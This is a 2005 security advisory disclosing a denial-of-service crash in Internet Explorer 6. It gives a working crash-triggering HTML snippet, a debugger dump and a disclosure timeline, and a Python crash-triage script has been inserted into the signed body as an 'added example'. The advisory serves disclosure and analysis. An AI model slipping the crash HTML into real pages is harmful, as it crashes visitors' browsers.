[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
---------------------------------------------------
| BuHa Security-Advisory #5    |  Dec 24th, 2005  |
---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0             |
| URL      | http://www.microsoft.com/windows/ie/ |
| Version  | <= 6.0.2900.2180.xpsp_sp2            |
| Risk     | Low (DoS - Null Read Dereference)    |
---------------------------------------------------
o Description:
=============
Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Denial of Service: <mshtml.dll>#7d6c74b1
===================
The following HTML code forces M$ IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html
These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6c748b 6a0b push 0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59 pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8 mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228 mov [edx+0x28],esi
7d6c749c e9af010000 jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728 mov eax,[edi+0x28]
7d6c74a4 8b7028 mov esi,[eax+0x28]
7d6c74a7 897728 mov [edi+0x28],esi
7d6c74aa 8b4320 mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24 mov ecx,[esi+0x24] ds:0023:00000024=????????
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8 neg ax
7d6c74bf 897510 mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40 inc eax
7d6c74c5 50 push eax
7d6c74c6 e80c8efeff call mshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0 movzx eax,al
7d6c74ce 48 dec eax
7d6c74cf 83f80c cmp eax,0xc
7d6c74d2 0f877b010000 jnbe mshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d jmp dword ptr [mshtml+0x2179c7 (7d6c79c7)+eax*4]
7d6c74df 8b4e20 mov ecx,[esi+0x20]
7d6c74e2 f6410208 test byte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc mov eax,[ebp-0x4]
7d6c74eb ff7014 push dword ptr [eax+0x14]
7d6c74ee 8b4610 mov eax,[esi+0x10]
7d6c74f1 03460c add eax,[esi+0xc]
7d6c74f4 50 push eax
7d6c74f5 e899ba0100 call mshtml+0x232f93 (7d6e2f93)
It appears to be a null read dereference crash (esi is 00000000, so the
faulting instruction reads from address 00000024), which is not exploitable.
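
The null-read assessment can be re-derived from the dump itself. The Python sketch below is an added example, not part of the original advisory: it parses the register values and the faulting line quoted above, computes the effective address and classifies the access. The function names and the 64 KB near-null threshold are assumptions chosen for illustration.

```python
import re

# Constructed sample: register dump and faulting line as quoted in the advisory.
REGISTERS = """eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8"""
FAULT_LINE = "7d6c74b1 8b4e24 mov ecx,[esi+0x24]"

# Assumption: addresses below 64 KB are treated as "near null" for triage.
NEAR_NULL_LIMIT = 0x10000

# Matches a simple [reg], [reg+0xNN] or [reg-0xNN] memory operand.
MEM = re.compile(r"\[(?P<base>e[a-z]{2})(?:(?P<sign>[+-])(?P<disp>0x[0-9a-f]+))?\]")


def parse_registers(text):
    """Return {'eax': 0x0129040a, ...} from 'name=8-hex-digit' pairs."""
    pairs = re.findall(r"\b([a-z]{2,3})=([0-9a-f]{8})\b", text)
    return {name: int(value, 16) for name, value in pairs}


def triage(line, regs):
    """Classify the memory access of a two-operand 'mov' dump line."""
    address, _opcode, mnemonic, operands = line.split(None, 3)
    dst, src = (op.strip() for op in operands.split(",", 1))
    m_dst, m_src = MEM.fullmatch(dst), MEM.fullmatch(src)
    mem = m_dst or m_src
    if mnemonic != "mov" or mem is None:
        raise ValueError("only 'mov' with one [reg+disp] operand is handled")
    disp = int(mem.group("disp") or "0", 16)
    if mem.group("sign") == "-":
        disp = -disp
    ea = (regs[mem.group("base")] + disp) & 0xFFFFFFFF
    return {
        "at_eip": int(address, 16) == regs["eip"],  # is this the faulting line?
        "access": "write" if m_dst else "read",
        "base": mem.group("base"),
        "effective_address": ea,
        "near_null": ea < NEAR_NULL_LIMIT,
    }


if __name__ == "__main__":
    result = triage(FAULT_LINE, parse_registers(REGISTERS))
    print({k: hex(v) if k == "effective_address" else v for k, v in result.items()})
```

The register values are only valid for the instruction at eip, which is why the result carries the at_eip flag; addresses computed for other lines of the dump are not reliable.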
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6 - Win 2k SP4
o Disclosure Timeline:
=====================
26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.
o Solution:
==========
There is no patch yet. The vulnerability will be fixed in an upcoming
service pack according to the Microsoft Security Response Center.
o Credits:
=========
Christian Deneke <bugtraq@xxxxxxxxxx>
- --
Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address; therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.
Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.
Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-----END PGP SIGNATURE-----